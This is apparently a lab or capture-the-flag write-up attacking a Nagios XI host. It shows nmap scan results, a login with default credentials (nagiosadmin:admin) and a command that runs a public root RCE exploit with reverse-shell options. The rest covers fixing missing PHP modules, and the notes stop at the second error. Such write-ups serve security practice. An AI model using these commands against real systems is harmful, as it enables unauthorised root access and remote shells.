PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b8:8c:40:f6:5f:2a:8b:f7:92:a8:81:4b:bb:59:6d:02 (RSA)
| 256 e7:bb:11:c1:2e:cd:39:91:68:4e:aa:01:f6:de:e6:19 (ECDSA)
|_ 256 0f:8e:28:a7:b7:1d:60:bf:a6:2b:dd:a3:6d:d1:4e:a4 (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=ubuntu
| Not valid before: 2020-09-08T17:59:00
|_Not valid after: 2030-09-06T17:59:00
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Nagios XI
|_http-server-header: Apache/2.4.18 (Ubuntu)
389/tcp open ldap OpenLDAP 2.2.X - 2.3.X
443/tcp open ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=192.168.1.6/organizationName=Nagios Enterprises/stateOrProvinceName=Minnesota/countryName=US
| Not valid before: 2020-09-08T18:28:08
|_Not valid after: 2030-09-06T18:28:08
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.18 (Ubuntu)
| tls-alpn:
|_ http/1.1
5667/tcp open tcpwrapped
Service Info: Host: ubuntu; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Going to port 80
When we clicked on Access Nagios XI we were redirected
Checked on the Google and found that the default credentials of Nagios XI is admin upon setup
https://docs.cloudera.com/HDPDocuments/HDP1/HDP-1.2.1/bk_installing_manually_book/content/rpm-chap12-2-3.html
nagiosadmin:admin
Found this exploit that can directly get root RCE
https://github.com/jakgibb/nagiosxi-root-rce-exploit
php exploit.php --host=192.168.81.136 --ssl=false --user=nagiosadmin --pass=admin --reverseip=192.168.49.81 --reverseport=1234
Then we got some error
┌──(kali㉿VirtualBox)-[~/Desktop]
└─$ php exploit.php --host=192.168.81.136 --ssl=false --user=nagiosadmin --pass=admin --reverseip=192.168.49.81 --reverseport=1234
PHP Fatal error: Uncaught Error: Call to undefined function curl_init() in /home/kali/Desktop/exploit.php:32
Stack trace:
#0 /home/kali/Desktop/exploit.php(22): extractNSP()
#1 {main}
thrown in /home/kali/Desktop/exploit.php on line 32
Then we go to stackoverflow and found the solution https://stackoverflow.com/questions/6382539/call-to-undefined-function-curl-init
sudo apt-get install php-curl
Then we run the command again, this time we get another error
┌──(kali㉿VirtualBox)-[~/Desktop]
└─$ php exploit.php --host=192.168.81.136 --ssl=false --user=nagiosadmin --pass=admin --reverseip=192.168.49.81 --reverseport=1234
[+] Grabbing NSP from: <https://192.168.81.136/nagiosxi/login.php>
[+] Retrieved page contents from: <https://192.168.81.136/nagiosxi/login.php>
PHP Fatal error: Uncaught Error: Class "DOMDocument" not found in /home/kali/Desktop/exploit.php:51
Stack trace:
#0 /home/kali/Desktop/exploit.php(22): extractNSP()
#1 {main}
thrown in /home/kali/Desktop/exploit.php on line 51
Easy stackoverflow https://stackoverflow.com/questions/14395239/class-domdocument-not-found